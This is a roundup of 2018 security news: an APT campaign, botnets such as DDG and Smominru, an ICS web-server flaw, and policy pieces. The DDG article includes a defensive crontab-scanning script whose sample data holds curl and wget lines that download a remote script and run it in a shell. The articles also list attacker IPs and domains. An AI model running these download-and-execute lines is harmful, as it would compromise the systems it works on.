Chinese Iron Tiger APT is back, a close look at the Operation PZChao
3.2.2018 securityaffairs APT

Chinese Iron Tiger APT is back: the new campaign, dubbed Operation PZChao, is targeting government, technology, education, and telecommunications organizations in Asia and the US.
Malware researchers from Bitdefender have discovered and monitored for several months the activity of a custom-built backdoor capable of stealing passwords, mining bitcoin and, of course, giving the attackers full control of the victim’s machine.

The campaign, dubbed Operation PZChao by Bitdefender, targets government, technology, education, and telecommunications organizations in Asia and the US.

“This is also the case of a custom-built piece of malware that we have been monitoring for several months as it wrought havoc in Asia. Our threat intelligence systems picked up the first indicators of compromise in July last year, and we have kept an eye on the threat ever since.” states the report published by BitDefender.
“An interesting feature of this threat, which drew our team to the challenge of analyzing it, is that it features a network of malicious subdomains, each one used for a specific task (download, upload, RAT related actions, malware DLL delivery). The payloads are diversified and include capabilities to download and execute additional binary files, collect private information and remotely execute commands on the system.”

It is interesting to note that the malware relies on a network of malicious subdomains, each one used for a specific task (download, upload, RAT-related actions, malware DLL delivery).

The experts who analyzed the command and control infrastructure and the malicious code used by the hackers (i.e. Gh0st RAT) suspect that the Iron Tiger APT group has returned.

The Iron Tiger APT (aka Emissary Panda or TG-3390) has been active since at least 2010 and initially targeted organizations in APAC, but since 2013 it has been attacking high-technology targets in the US.

The experts found many similarities between the Gh0stRat samples used in the Operation PZChao and the ones used in past campaigns associated with the Iron Tiger APT.

Attackers behind Operation PZChao targeted victims with spear-phishing messages carrying a malicious VBS file attachment that, once executed, downloads the malicious payloads to Windows systems from a distribution server. The researchers determined that the server, at IP address 125.7.152.55 in South Korea, hosts the subdomain down.pzchao.com.

Experts highlighted that new components are downloaded and executed on the target system in every stage of the attack.

Operation PZChao

The experts discovered that the first payload dropped onto compromised systems is a bitcoin miner.

The miner is disguised as a ‘java.exe’ file and runs every three weeks at 3 am to avoid being noticed; the cryptocurrency it mines likely funds the campaign.

But don’t forget that the main goal of Operation PZChao is cyber espionage: the malicious code leverages two versions of the Mimikatz tool to gather credentials from the infected host.

The most important component in the attacker’s arsenal remains the powerful Gh0st RAT malware, which gives the operators control over every aspect of the infected system.

“This remote access Trojan’s espionage capabilities and extensive intelligence harvesting from victims turns it into an extremely powerful tool that is very difficult to identify,” concluded Bitdefender. “The C&C rotation during the Trojan’s lifecycle also helps evade detection at the network level, while the impersonation of legitimate, known applications takes care of the rest.”


Does The U.S. Need a National Cybersecurity Safety Board?
2.2.2018 securityweek BigBrothers
It is time, suggest two academics from Indiana University-Bloomington, for Congress to establish a National Cybersecurity Safety Board (NCSB) as an analogue of the National Transportation Safety Board (NTSB), to improve the level of cybersecurity in the U.S.

The argument is that the NTSB helped to improve the safety of air travel while still stimulating growth and innovation in the industry. "Today," they say in a paper published this week, "air travel is widely regarded as among the safest forms of mass transportation. Can the same feat be replicated in cyberspace?"

Scott J. Shackelford JD, PhD, and Austin E. Brady argue, in their paper "Is it Time for a National Cybersecurity Safety Board? Examining the Policy Implications and Political Pushback", that it is both time, and possible (although not immediately probable). "A NCSB is politically unlikely in the near term, but we believe that the creation of such a body is overdue... All that is needed is the political will to act, the desire to experiment with new models of cybersecurity governance, and the recognition that we should learn from history."

The paper argues that there have been many propositions for strengthening U.S. cybersecurity, "from federally sponsored cyber risk insurance programs to allowing companies to have a freer hand to engage in proactive cybersecurity measures." The former would allow the insurer to impose cybersecurity conditions, while the latter would allow 'active defense' or even the right to 'hack back'. Across most of these proposals, it suggests, "are more robust data breach investigation requirements."

This connection is not clearly established in the paper, although it precisely aligns with the transportation functions of the NTSB. The argument is that we can better prevent future cybersecurity breaches by more fully understanding past breaches, and that this process needs to be established by government.

There is an alternative model for improving cybersecurity that is not mentioned in this paper: an American Cybersecurity Association (ACA) that uses the American Medical Association (AMA) as the model. This argument argues that professionalizing the cybersecurity workforce in the same way that the AMA professionalized the medical profession would raise the standard and quality of organizations' cybersecurity.

The ACA approach has been described by Martin Zinaich, Information Security Officer at the City of Tampa, FL. In his paper, 'What does Information Security have in common with Eastern Air Lines Flight 401?', he argues, "The AMA accelerated the professionalization of medicine and the establishment of minimum standards in medical training, education and apprenticeship requirements to gain entry to the profession. The same could and should be done in the Information Security field with a similar cybersecurity national body and professional associations."

The difference between the two approaches is that one imposes regulations from outside of the profession, while the other generates standards from within the profession. Both, however, suffer from inertia, and Shackelford and Brady argue that Congress should force the issue by establishing a national safety board.

"Such a model would be an improvement on the existing reliance on Cyber Emergency Response Teams (CERTs), and aid in effective policy making at both the state and federal level given the lack of hard, verifiable data on the scope and scale of cyber attacks. The creation of a NCSB could also help law enforcement investigations, particularly local and state agencies without the resources and expertise of the FBI. Along with the ISACs, this would be a boon to academics needing reliable data to undertake scholarly analysis, as well as national security organizations, and U.S. strategic partners around the world."

Interestingly, the authors spend some time looking at the European cybersecurity model depicted by the General Data Protection Regulation (GDPR) and the Network Information Systems Directive (NISD), both coming into force in May 2018. "Although neither the GDPR nor the NIS Directive includes a version of a regional Cybersecurity Safety Board, the elements it does include move the EU in this direction, which could make an analogous U.S. body that much more effective," they write. "Such developments would be an important step on the long journey to a positive and sustainable cyber peace."

However, GDPR is far removed from any form of a national cybersecurity safety board. The authors say, "it centralizes data protection authority in the EU into a single regulatory body, as compared with the EU Data Privacy Directive’s (DPD) utilization of national data protection authorities for each Member State." This isn't strictly true -- each member state will retain its own regulatory body, and there are many areas within the regulation where national transposition has a degree of flexibility over implementation and interpretation. While GDPR is a unifying force, its application will still vary slightly between different member states.

Such minor differences are likely to be exacerbated by the concept of national security -- which again varies between different member states. "The extent of some of these obligations, however, is still unclear, as States may see cyber threats as falling in the realm of national security, and therefore outside the scope of this strata of EU governance," note the authors.

The interplay between national security and cybersecurity is not discussed within this paper; and yet it is fundamental to the way in which any overarching regulation -- whether the EU's GDPR or a proposed U.S. NCSB -- can actually operate. In the name of national security there will always be areas where intelligence agencies, and politicians, will seek to keep the true nature of events secret. There is likely to be considerable pushback from the intelligence agencies against any national body that has the independence of the NTSB, and the independence proposed for an NCSB.

How, for example, could an NCSB handle an investigation into a breach such as the Belgacom telco hack that was revealed in 2013? According to leaked documents (Snowden) it was undertaken by GCHQ using the NSA's 'quantum insertion' technology.

Martin Zinaich certainly has his concerns over an NCSB. "I support anything that might solidify a structuring of Information Security into a normalized business risk profile," he told SecurityWeek. "However, it seems to me a National Cybersecurity Safety Board might not be the best place to start. I also do not think a NCSB could be agile enough to keep pace.

"If there is one area where Cyber Security professionals excel," he continued, "it is in the identification of cyber-attacks and breaches. Too often, the cause is not a mystery where an investigative body would expose an unknown risk that could then be shared to make the industry safer (as does the current NTSB). No, too often the cause is well-known and age old. Take the 2017 Equifax breach. The vector was an Apache Struts vulnerability that had already been patched but the patch was not applied (and there are a lot of non-technical reasons why that can be so)."

Zinaich retains his belief that the best way to improve cybersecurity is by professionalizing the practitioners. "The issue is the integration of Information Security into the business at a level where it has an impact -- be the business a manufacturer of IoT devices or a credit lending institution. I still hold that professionalizing this field is the place to start, but I predict legislation will come first."

While there are strong arguments, as outlined in this paper, for the formation of a National Cybersecurity Safety Board, it is probably not achievable in the current geopolitical climate. Similarly, while there are strong arguments in favor of an American Cybersecurity Association, existing practitioners are generally too busy firefighting cybersecurity incidents to get it started.

The greater likelihood is that the current tendency for government to impose regulations to improve cybersecurity will simply continue and gather pace.


Web Server Used in 100 ICS Products Affected by Critical Flaw
2.2.2018 securityweek ICS
A critical vulnerability that could allow a remote attacker to execute arbitrary code has been found in a component used by more than 100 industrial control systems (ICS) from tens of vendors.

The flaw affects the web server component of 3S-Smart Software Solutions’ CODESYS WebVisu product, which allows users to view human-machine interfaces (HMIs) for programmable logic controllers (PLCs) in a web browser.

According to the CODESYS website, the WebVisu product is used in 116 PLCs and HMIs from roughly 50 vendors, including Schneider Electric, WAGO, Hitachi, Advantech, Beck IPC, Berghof Automation, Hans Turck, and NEXCOM.

Zhu WenZhe of Istury IOT discovered that the CODESYS web server is affected by a stack-based buffer overflow vulnerability that could allow an attacker to cause a denial-of-service (DoS) condition and possibly even execute arbitrary code on the web server.

“A crafted web server request may cause a buffer overflow and could therefore execute arbitrary code on the web server or lead to a denial-of-service condition due to a crash in the web server,” 3S-Smart Software Solutions explained in an advisory.

The vendor says that while there is no evidence that the flaw has been exploited in the wild, even an attacker with low skill may be able to exploit it remotely.


The vulnerability is tracked as CVE-2018-5440 and it has been assigned a CVSS score of 9.8. CODESYS v2.3 web servers running on any version of Windows (including Windows Embedded Compact) as stand-alone or part of the CODESYS runtime system prior to version 1.1.9.19 are affected. Version 1.1.9.19, which is also part of the CODESYS 2.3.9.56 setup, patches the vulnerability.

While 3S-Smart Software Solutions says it has not identified any workarounds for this security hole, the company has advised organizations to ensure that access to controllers is restricted through minimization of network exposure, and the use of firewalls and VPNs. The company has also published a white paper with general recommendations on security in industrial control applications.

Vulnerabilities in CODESYS components are not uncommon. Last April, industrial cybersecurity startup CyberX uncovered several critical flaws in the CODESYS web server. More recently, SEC Consult reported that a CODESYS component flaw exposed PLCs from WAGO and possibly other vendors to attacks.

Shodan has been crawling port 2455, which is specific to the CODESYS protocol, since 2014. The search engine currently shows more than 5,600 systems reachable via this port, with a majority in the United States, Germany, Turkey, China and France.

Shodan map shows CODESYS devices


New Botnet Is Recruiting IoT Devices
2.2.2018 securityweek BotNet
A new botnet is recruiting Internet of Things (IoT) devices by exploiting two vulnerabilities already popular among IoT botnets, Radware has discovered.

Dubbed JenX, the threat is abusing the CVE-2014-8361 (Realtek SDK Miniigd UPnP SOAP Command Execution) and CVE-2017-17215 (Huawei Router HG532 Arbitrary Command Execution) vulnerabilities. Both of these security issues were previously abused by the Mirai variant Satori.

The new threat also uses techniques associated with the recently detailed PureMasuta variant of Mirai, which recently had its source code published on an invite-only dark forum.

The botnet’s command and control (C&C) server also provides gaming mod servers and distributed denial of service (DDoS) services, Radware's researchers discovered.

The DDoS feature includes attack vectors such as Valve Source Engine Query and 32-byte floods, TS3 scripts, and a Down OVH option (likely a reference to the Mirai attack on the cloud hosting provider OVH in September 2016). The miscreants guarantee attack volumes of 290-300Gbps, supposedly leveraging the power of the new botnet.

JenX uses servers to perform the scanning and exploit operations, unlike previously observed IoT botnets such as Mirai, Hajime, Persirai, Reaper, Satori, and Masuta, which leverage infected systems for scanning and exploiting (which also fuels an exponential growth of the botnet).

Because it does not include scanning and exploit payloads, JenX’s code is unsophisticated and lighter on delivery, Radware says. With centralized scan and exploit functionality, the operators also have increased flexibility to expand and improve the functionality without increasing the size of the bot.

Because there are fewer nodes scanning and exploiting, the botnet is less noisy and can better avoid being detected by honeypots. This also makes it more difficult to estimate the botnet’s size, without accessing the C&C server, the security researchers say. On top of that, the botnet only impacts the victim’s network connection when instructed to perform an attack.

“The drawback of the central approach is a less than linear growth with the number of deployed servers. Much slower compared to the exponential growth rate of and less aggressive than distributed scanning botnets,” Radware notes.

The malware is protected with anti-debugging detection and its binary forks three processes obfuscated in the process table, much like Mirai. All processes listen on a port bound to localhost, while one opens a TCP socket to the C&C at 80.82.70.202 on port 127. The bot uses XOR obfuscation with the exact same key used in PureMasuta.

When executed, the malware connects to the C&C server located by the hostname ‘skids.sancalvicie.com’ using the TCP session (the domain is registered to Calvos S.L.). The server supposedly provides a command line interface.

The code has indicators of a Valve Source Engine Query attack payload, likely because of the GTA San Andreas multiplayer servers on the domain. The attack vector was included in the original Mirai code that went public in October 2016, and Radware believes the botnet is being built by the San Calvicie hacker group and served through their Clearnet website.

“Unless you frequently play GTA San Andreas, you will probably not be directly impacted. The botnet is supposed to serve a specific purpose and be used to disrupt services from competing GTA SA multiplayer servers. I do not believe that this will be the botnet that will take down the internet! But it does contain some interesting new evolutions and it adds to a list of IoT botnets that is growing longer and faster every month,” Radware’s Pascal Geenens notes.

Two providers informed on the issue have already taken down the exploit servers hosted in their datacenters, but some servers remain active and the botnet is still operational, Geenens says. However, should the attackers decide to move their exploit servers to the darknet, the botnet’s takedown would be much more difficult, as was the case with BrickerBot.

“JenX, in particular, can be easily concealed and hardened against takedowns. As they opted for a central scan and exploit paradigm, the hackers can easily move their exploit operations to bulletproof hosting providers who provide anonymous VPS and dedicated servers from offshore zones. These providers do not care about abuse,” Geenens says.


Hundreds of ICS products affected by a critical flaw in CODESYS WebVisu
2.2.2018 securityaffairs ICS

A researcher discovered a critical vulnerability in the web server component of 3S-Smart Software Solutions’ CODESYS WebVisu product, currently used in 116 PLCs and HMIs from many vendors.
Security researcher Zhu WenZhe from Istury IOT discovered a critical stack-based buffer overflow vulnerability in the web server component of 3S-Smart Software Solutions’ CODESYS WebVisu product that allows users to view human-machine interfaces (HMIs) for programmable logic controllers (PLCs) in a web browser.

The vulnerability is tracked as CVE-2018-5440 and it has been assigned a CVSS score of 9.8, and the worst news is that it is quite easy to exploit.

The WebVisu product is currently used in 116 PLCs and HMIs from many vendors, including Schneider Electric, Hitachi, Advantech, Berghof Automation, Hans Turck, and NEXCOM.

An attacker can remotely trigger the flaw to cause a denial-of-service (DoS) condition and under some conditions execute arbitrary code on the web server.

“A crafted request may cause a buffer overflow and could therefore execute arbitrary code on the web server or lead to a denial-of-service condition due to a crash in the web server.” reads the security advisory issued by CODESYS.

According to CODESYS, there is no evidence that the flaw has been exploited in the wild.

The flaw affects all Microsoft Windows (including WinCE) based CODESYS V2.3 web servers running stand-alone or as part of the CODESYS runtime system prior to version V1.1.9.19.

The company has released the CODESYS web server V1.1.9.19 for CODESYS V2.3 to address the flaw. This is also part of the CODESYS setup V2.3.9.56.

The vendor also recommends that organizations restrict access to controllers and use firewalls and VPNs to control that access.

In December 2017, security researchers at SEC Consult discovered a flaw in version 2.4.7.0 of the CODESYS runtime, which is included on PFC200s with firmware version 02.07.07. The CODESYS runtime is commonly included on PLCs to allow for easy programming by users. A total of 17 models of WAGO PFC200 Series PLCs were found vulnerable to remote exploitation.

A PLC flaw can be a serious threat to production and critical infrastructure

Back to the present: querying the Shodan search engine for port 2455, used by the CODESYS protocol, shows more than 5,600 systems exposed online, most of them in the United States, Germany, Turkey, and China.

CODESYS hack


DDG, the second largest mining botnet targets Redis and OrientDB servers
2.2.2018 securityaffairs BotNet

Researchers at Qihoo 360’s Netlab analyzed a new campaign powered by the DDG botnet, the second largest mining botnet ever observed, which targets Redis and OrientDB servers.
A new Monero-mining botnet dubbed DDG was spotted in the wild, the malware targets Redis and OrientDB servers.

According to the researchers at Qihoo 360’s Netlab, the DDG botnet was first detected in 2016 and was continuously updated throughout 2017.

“Starting 2017-10-25, we noticed there was a large scale ongoing scan targeting the OrientDB databases. Further analysis found that this is a long-running botnet whose main goal is to mine Monero CryptoCurrency. We name it DDG.Mining.Botnet after its core function module name DDG.” reads the analysis published by Netlab.

The miner has already infected nearly 4,400 servers and has mined over $925,000 worth of Monero since March 2017, which makes DDG one of the largest mining botnets.

Yesterday I wrote about the largest mining botnet, Smominru, which has infected over 526,000 Windows machines; its operators had already mined approximately 8,900 Monero ($2,346,271 at the current rate).

The malware exploits the remote code execution vulnerability CVE-2017-11467 to compromise OrientDB databases and targets Redis servers via a brute-force attack.

Crooks are focusing their efforts on attacks against servers that usually have significant computing capabilities.

The attack chain described by the researchers from Qihoo 360’s Netlab is composed of the following steps:

Initial Scanning: The attacker (ss2480.2) exploits the known RCE vulnerability of the OrientDB database and drops the attack payload
Stage 1: Attackers modify local Crontab scheduled tasks, download and execute i.sh (hxxp://218.248.40.228:8443/i.sh) on the primary server and keep it synchronized every 5 minutes
Stage 2: DDG traverses the built-in file hub_iplist.txt, checks the connectivity of each entry and tries to download the corresponding miner program wnTKYg from the first one that can be reached (wnTKYg.noaes if the local CPU does not support AES-NI)
Mining Stage: The Miner program begins to use the computing resources of the compromised host to begin mining for the attacker’s wallet.
The following image shows the DDG Mining Botnet attack process:

DDG botnet
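One defender-side check that follows from the stage-1 persistence step above, written as an added example (not Netlab's code): it scans crontab text for entries that re-run on a short interval and fetch a remote script straight into a shell. The sample crontab is constructed; the 218.248.40.228:8443 URL is the one quoted in the Netlab analysis, while hub.example.invalid is a placeholder host.

```python
"""Flag crontab entries that match the DDG stage-1 persistence pattern.

Added example for this article, not code from Netlab. The crontab text is
constructed; the 218.248.40.228:8443 URL is the one quoted in the analysis,
hub.example.invalid is a placeholder host.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O - http://hub.example.invalid:8443/i.sh | bash
30 4 * * 0 /usr/local/bin/backup.sh
"""

FETCH_TOOL = re.compile(r"\b(curl|wget)\b")
REMOTE_URL = re.compile(r"https?://[^\s|;&'\"]+")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")
EVERY_N_MINUTES = re.compile(r"^\*/(\d+)$")
RAW_IP_HOST = re.compile(r"^\d{1,3}(\.\d{1,3}){3}(:\d+)?$")


@dataclass
class Finding:
    line_no: int
    schedule: str
    url: Optional[str]
    reasons: List[str] = field(default_factory=list)


def split_entry(line: str):
    """Return (five schedule fields, command) or None for a malformed line."""
    parts = line.split(None, 5)
    if len(parts) < 6:
        return None
    return parts[:5], parts[5]


def inspect_command(cmd: str):
    """Return (url, reasons) describing download-and-execute behaviour."""
    reasons = []
    match = REMOTE_URL.search(cmd)
    url = match.group(0) if match else None
    if url and FETCH_TOOL.search(cmd):
        reasons.append("downloads remote content with curl/wget")
        if PIPE_TO_SHELL.search(cmd):
            reasons.append("pipes the download straight into a shell")
        host = url.split("//", 1)[1].split("/", 1)[0]
        if RAW_IP_HOST.match(host):
            port = host.split(":")[1] if ":" in host else "80"
            if port not in ("80", "443"):
                reasons.append(f"raw IP address on non-standard port {port}")
        if url.endswith("/i.sh"):
            reasons.append("fetches i.sh, the DDG stage-1 script name")
    return url, reasons


def analyse_crontab(text: str, min_reasons: int = 2) -> List[Finding]:
    """Return entries that combine a short re-run interval with download-and-run."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parsed = split_entry(line)
        if parsed is None:
            continue
        fields, cmd = parsed
        url, reasons = inspect_command(cmd)
        m = EVERY_N_MINUTES.match(fields[0])
        if m and int(m.group(1)) <= 10 and fields[1] == "*":
            reasons.insert(0, f"re-runs every {m.group(1)} minutes (DDG uses 5)")
        if len(reasons) >= min_reasons:
            findings.append(Finding(no, " ".join(fields), url, reasons))
    return findings


if __name__ == "__main__":
    for f in analyse_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no} [{f.schedule}] {f.url}")
        for r in f.reasons:
            print("   -", r)
```

Run it against the output of `crontab -l` for each account (and the files under /etc/cron.d) to catch the same pattern on hosts that are not OrientDB or Redis servers.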
The researchers sinkholed the botnet traffic and observed 4,391 IP addresses of compromised servers from around the world. Most of the infections are in China (73%), followed by the United States (11%); the botnet is mainly composed of compromised Redis databases (88%).

Cybercriminals are using three wallet addresses; the botnet mined 3,395 Monero ($925,000), but researchers also discovered another wallet containing 2,428 Monero ($660,000).

“The total income is Monero 3,395 or 5,760. These tokens are worth USD 925,383 or 1,569,963 today. Note: There is an issue for the second wallet, where “Total Paid” is not consistent with the summary of all transactions’ amount. We cannot confirm which number is more accurate, so we show both numbers here.” continues the analysis.

Further information including the IoCs are included in the technical report published by Qihoo 360’s Netlab.


It's Time For Machine Learning to Prove Its Own Hype
2.2.2018 securityweek IT

Machine Learning in Cybersecurity

Machine Learning is a Black Box that is Poorly Understood

2017 was the year in which 'machine learning' became the new buzzword -- almost to the extent that no new product could be deemed new if it didn't include machine learning.

Although the technology has been used in cybersecurity for a decade or more, machine learning is now touted as the solution rather than part of the solution.

But doubts have emerged. Machine learning is a black box that is poorly understood; and security practitioners like to know exactly what it is they are buying and using.

The problem, according to Hyrum Anderson, technical director of data science at Endgame (a vendor that employs machine learning in its own endpoint protection product), is that users don't know how it works and therefore cannot properly evaluate it. To make matters worse, machine learning vendors do not really understand what their own products do -- or at least, how they come to the conclusions they reach -- and therefore cannot explain the product to the satisfaction of many security professionals.

The result, Anderson suggests in a blog post this week, is "growing veiled skepticism, caveated celebration, and muted enthusiasm."

It's not that machine learning doesn't work -- it clearly does. But nobody really understands how it reaches its decisions.

Anderson quotes Ali Rahimi. "He compared some trends, particularly in deep learning, to the medieval practice of Alchemy. 'Alchemy ‘worked’,' Ali admitted. 'Alchemists invented metallurgy, ways to dye textiles, our modern glass-making processes, and medications. Then again, Alchemists also believed they could cure diseases with leeches, and turn base metals into gold'."

"If the physicist’s mantra is Feynman’s 'What I cannot create, I do not understand'," he continues, "then the infosec data scientist should adopt, 'What cannot be understood, should be deployed with care.' Implied, but not spoken, is 'if at all'."

This problem of not understanding how a conclusion is reached could become much worse if a possible interpretation of Article 22 of the EU's General Data Protection Regulation (GDPR) is enforced to its full potential. This states, "The data subject shall have the right not to be subject to a decision based solely on automated processing, including profiling, which produces legal effects concerning him or her or similarly significantly affects him or her."

This should not directly affect machine-learning malware detection because data subjects are not directly involved, but could have implications for other applications used by both IT and security departments.

GDPR's Recital 71 clarifies the requirement. It adds, "In any case, such processing should be subject to suitable safeguards, which should include specific information to the data subject and the right to obtain human intervention, to express his or her point of view, to obtain an explanation of the decision reached after such assessment and to challenge the decision."

Right now, suggests Anderson, this would be largely impossible. "The point is that although some models may reach impressive predictive performance, it may not be clear what information in the data directly determines the decisions. Ironically, machine learning is such that even with full access to the source code and data, it may still be very difficult to determine 'why' a model made a particular decision."

A partial solution for infosec practitioners would come from the increased involvement of the machine learning industry with third party testing. This would at least enable the practitioners to understand how effective the algorithms are, even if not how they work. Although some machine-learning, so-called next-gen, endpoint protection vendors have been slow and reluctant to embrace third-party testing, Endgame is not one of them.

"Fortunately," writes Anderson, "there are technique-agnostic methods to compare solutions. We have previously argued that AV can be compared apples-to-apples to ML by comparing both false positive and true positive rates, for example, whereas 'accuracy' is wholly inadequate and may hide all manner of sins... In the endpoint security space, vendors are beginning to offer holistic breach tests rather than AV-only tests, which help customers value a broader protection landscape."
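As an added illustration of the point that accuracy "may hide all manner of sins" (constructed example code, not Endgame's or the article's), the script below scores two hypothetical detectors on a heavily imbalanced test set: a detector that never alerts scores higher on accuracy than one that catches 90% of the malware at a 2% false positive rate, and only the true/false positive rates expose the difference.

```python
"""Accuracy versus true/false positive rates on an imbalanced test set.

Added example for this article; the labels and both detectors are constructed
and stand in for no real product.
"""
from typing import Dict, List, Sequence

# Constructed evaluation set: 9,800 benign files and 200 malicious ones,
# the kind of imbalance an endpoint-protection test actually sees.
N_BENIGN, N_MALICIOUS = 9800, 200
Y_TRUE: List[int] = [0] * N_BENIGN + [1] * N_MALICIOUS   # 1 = malicious


def confusion(y_true: Sequence[int], y_pred: Sequence[int]) -> Dict[str, int]:
    """Count true/false positives and negatives for binary labels."""
    if len(y_true) != len(y_pred):
        raise ValueError("label and prediction lengths differ")
    counts = {"tp": 0, "fp": 0, "tn": 0, "fn": 0}
    for truth, pred in zip(y_true, y_pred):
        if truth == 1:
            counts["tp" if pred == 1 else "fn"] += 1
        else:
            counts["fp" if pred == 1 else "tn"] += 1
    return counts


def rates(counts: Dict[str, int]) -> Dict[str, float]:
    """Accuracy, true positive rate (detection) and false positive rate."""
    total = sum(counts.values())
    positives = counts["tp"] + counts["fn"]
    negatives = counts["fp"] + counts["tn"]
    return {
        "accuracy": (counts["tp"] + counts["tn"]) / total,
        "tpr": counts["tp"] / positives if positives else 0.0,
        "fpr": counts["fp"] / negatives if negatives else 0.0,
    }


def silent_detector(y_true: Sequence[int]) -> List[int]:
    """Hypothetical detector that never alerts on anything."""
    return [0] * len(y_true)


def working_detector(y_true: Sequence[int]) -> List[int]:
    """Hypothetical detector: catches 9 of every 10 malicious samples and
    wrongly flags 1 in every 50 benign ones (deterministic, not random)."""
    preds, seen_benign, seen_malicious = [], 0, 0
    for truth in y_true:
        if truth == 1:
            preds.append(0 if seen_malicious % 10 == 0 else 1)
            seen_malicious += 1
        else:
            preds.append(1 if seen_benign % 50 == 0 else 0)
            seen_benign += 1
    return preds


def evaluate() -> Dict[str, Dict[str, float]]:
    """Score both detectors on the constructed set."""
    return {
        "silent": rates(confusion(Y_TRUE, silent_detector(Y_TRUE))),
        "working": rates(confusion(Y_TRUE, working_detector(Y_TRUE))),
    }


def ranked_by(results: Dict[str, Dict[str, float]], metric: str) -> List[str]:
    """Detector names ordered best-first on one metric (fpr: lower is better)."""
    reverse = metric != "fpr"
    return sorted(results, key=lambda name: results[name][metric], reverse=reverse)


if __name__ == "__main__":
    results = evaluate()
    for name, r in results.items():
        print(f"{name:8s} accuracy={r['accuracy']:.4f} tpr={r['tpr']:.2f} fpr={r['fpr']:.3f}")
    print("best by accuracy:", ranked_by(results, "accuracy")[0])
    print("best by detection rate:", ranked_by(results, "tpr")[0])
```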

But ultimately, it is the lack of visibility into the working of machine learning and AI algorithms that must change. "My call for 2018," says Anderson, "is to continue to address what is still particularly needed in ML infosec research: more cross-pollination between academia and industry, more open community engagement from security vendors, and more open datasets for reproducible research. By doing this, we’ll continue to move ML in infosec from the dark arts of Alchemy to rigorous Science."

Endgame was founded in 2008 by Chris Rouland and other executives who previously worked with the CIA and Internet Security Systems. It originally discovered and sold 0-day vulnerabilities, but shifted away from this around 2014. Under current CEO Nate Fick's leadership, it has grown its commercial offering using more than $100 million in funding, including a $23 million Series B funding round in March 2013 followed by a $30 million Series C round in November 2014.


Crypto-Mining Botnet Ensnares 500,000 Windows Machines
2.2.2018 securityweek BotNet
Focused on mining Monero crypto-currency, a new botnet has managed to ensnare over half a million machines to date, Proofpoint reports.

Dubbed Smominru, the botnet managed to infect over 526,000 Windows hosts to date, most of which are believed to be servers. After conducting a sinkholing operation, the security researchers discovered that the infected machines are distributed worldwide, with the highest numbers in Russia, India, and Taiwan.

The Monero miner, which is also known as Ismo, has been observed since the end of May 2017 spreading via EternalBlue, the National Security Agency-linked exploit that targets a vulnerability (CVE-2017-0144) in Windows’ Server Message Block (SMB) on port 445. The exploit was previously used in other global attacks, including WannaCry and NotPetya.

The miner itself has been detailed numerous times before, and was associated with various attacks, including those perpetrated by an established Chinese crime group (Hex Men).

What makes it stand out in the crowd is the use of Windows Management Instrumentation for infection, a method recently noticed in the WannaMine crypto-mining worm too (which also uses EternalBlue to spread).

The hash power associated with the Monero payment address for Smominru reveals that the botnet was likely twice the size of Adylkuzz, the first crypto-mining botnet to abuse EternalBlue. According to Proofpoint, Smominru’s operators already mined around 8,900 Monero (between $2.8 million and $3.6 million), at a rate of around 24 Monero per day.

In a recent report diving into the huge financial gains crypto-miner operators register, Talos revealed that an adversary controlling 1,000 systems would make around $90,000 per year. The security firm also says it “has observed botnets consisting of millions of infected systems,” which “could be leveraged to generate more than $100 million per year theoretically.”

While investigating Smominru, Proofpoint discovered that at least 25 of the hosts were attempting to infect new machines via EternalBlue (all of them hosted within autonomous system AS63199).

Last week, NetLab 360 security researchers published a post on what they call the MyKings botnet, which appears to be none other than Smominru, based on the used Monero address. NetLab revealed that the mining operation was performed by a sub-botnet, while another was focused on scanning and spreading, capable of mobilizing over 2400 host IP addresses.

According to Proofpoint, some of the distribution attacks are likely performed through MySQL, while others appear to leverage EsteemAudit (CVE-2017-0176), another NSA-linked exploit, this one targeting the Remote Desktop Protocol (RDP) on Windows XP and Windows Server 2003.

Both NetLab and Proofpoint findings fall in line with GuardiCore’s report on the Hex Men, a group using three malware families, namely Hex, Hanako and Taylor, each targeting different SQL servers with its own goals, scale and target services.

The botnet’s command and control (C&C) infrastructure is hosted behind SharkTech, Proofpoint’s security researchers have discovered. The company was informed on the issue.

MineXMR was also contacted regarding the Monero address associated with Smominru, and the mining pool banned the address. This prompted the botnet operators to register new domains and switch mining to a new address on the same pool. The switch apparently cost the operators control over one third of the bots.

“Because most of the nodes in this botnet appear to be Windows servers, the performance impact on potentially critical business infrastructure may be high, as can the cost of increased energy usage by servers running much closer to capacity. The operators of this botnet are persistent, use all available exploits to expand their botnet, and have found multiple ways to recover after sinkhole operations,” Proofpoint notes.

The use of standalone coin miners and of coin-mining modules bolted onto existing malware has proliferated over the past year, fueled by the surge in the value of crypto-currencies such as Bitcoin and Monero. Because Bitcoin is too resource-intensive to mine profitably outside dedicated mining farms, Monero, whose proof-of-work is designed to run on ordinary CPUs, has drawn massive interest from cybercriminals.

Smominru’s operators have likely made significant profits from the operation, and the resilience of the botnet and its infrastructure suggests the activity will continue, the researchers say. The impact on infected nodes will persist as well, and other botnets with a similar purpose and methods are likely to emerge.

“We repeatedly see threat actors ‘follow the money’ - over the last several months, the money has been in cryptocurrency and actors are turning their attention to a variety of illicit means to obtain both Bitcoins and alternatives,” Kevin Epstein, VP Threat Operations, Proofpoint, said in an emailed comment.

“This Monero mining botnet is extremely large, made up mostly of Microsoft Windows servers spread around the globe. Taking down the botnet is very difficult given its distributed nature and the persistence of its operators. For businesses, preventing infection through robust patching,” Epstein concluded.


The Price of Cybercrime: 9 Years in One Case, 6 Months in Another
2.2.2018 securityweek Crime
Travon Williams, 33, was sentenced by the District Court for the Eastern District of Virginia to 9 years in jail for his role in a credit card fraud and identity theft scheme.

For more than two years, Williams led a gang that purchased thousands of stolen credit and debit card numbers from the dark web. The numbers were then encoded onto fraudulent cards and used to purchase merchandise such as gift cards and cigarette cartons. The cigarettes were sold on to buyers from New York City, who drove down to Northern Virginia to transport the cigarettes.

Williams is one of 12 defendants arrested in August 2017. He obtained $415,000 in proceeds from his crimes.

All 12 defendants have pleaded guilty for their roles in the scheme. Williams is the sixth to have been sentenced. The remaining six are due to be sentenced in February and March.

